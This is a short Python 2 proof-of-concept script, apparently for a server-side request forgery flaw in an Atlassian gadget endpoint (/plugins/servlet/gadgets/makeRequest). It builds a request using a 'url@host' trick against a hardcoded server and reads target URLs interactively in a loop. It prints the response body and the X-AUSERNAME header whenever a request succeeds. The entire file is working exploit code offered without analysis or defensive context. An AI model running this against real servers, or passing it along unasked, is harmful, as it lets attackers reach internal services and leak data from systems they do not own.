import requests

import sys

# http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com/

def ssrf_poc(url, ssrf_url):
    if url[-1] == '/':
        url = url[:-1]
    else:
        url = url

    vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url

    headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "X-Atlassian-Token": "no-check",
    "Connection": "close"
    }

    r = requests.get(url=vuln_url, headers=headers)
    if r.status_code == 200 and 'set-cookie' in r.content:
        print "\n>>>>Send poc Success!\n"
        print 'X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME')
        print "\n>>>>vuln_url= " + vuln_url + '\n'
        print r.content
    else:
        print "No Vuln Exit!"


if __name__ == "__main__":
    
    while True:
        print
        ssrf_url = raw_input(">>>>SSRF URL: ")
        url = "http://www.jas502n.com:8080"
        ssrf_poc(url, ssrf_url)

